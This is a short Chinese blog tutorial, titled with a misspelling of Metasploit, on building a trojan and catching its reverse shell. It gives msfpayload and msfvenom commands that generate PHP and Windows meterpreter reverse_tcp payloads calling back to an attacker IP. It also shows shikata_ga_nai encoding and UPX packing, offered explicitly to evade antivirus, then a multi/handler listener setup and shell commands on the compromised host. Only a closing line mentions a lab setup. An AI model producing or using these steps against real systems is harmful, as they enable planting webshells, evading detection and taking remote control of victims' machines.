Meatsploi之生成webshell及应用

Meatsploi之生成webshell及应用

  • 1.终端:生成木马,将生成的脚本上传到网站

    msfpayload php/meterpreter/reverse_tcp LHOST=192.168.43.80 R >php.exe
    //生成一个PHP脚本木马
    cat         //查看文件内容
    
    • 现在怎么生成PHP木马还不太清楚

      • 更新了kali了,现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode
      • kali2.0之后的可以使用以下命令

        msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
        // -p payload
        -e 编码方式
        -i 编码次数
        -b 在生成的程序中避免出现的值
        LHOST,LPORT 监听上线的主机IP和端口
        -f exe 生成EXE格式
        
    • 还可以使用UPX加壳,做免杀处理,命令如下

      upx -5 /root/Desktop/acn.exe
      
  • 2.做一个反弹会话的一个链接

    use exploit/multi/handler
    set LHOST 192.168.43.80
    set LPORT 55555
    show options
    exploit
    
    完成一系列设置之后生成一个等待状态的会话,一旦木马被触发,即可获得会话
  • 3.开始你的表演

    shell
    execute -f notepad
    ......
    
做实验的话,可以自己准备一个ftp服务器用来作为生成的木马的目的地,通过另一个操作系统,去访问服务器上的这一文件,完成触发过程
-------------本文结束感谢您的阅读-------------
0%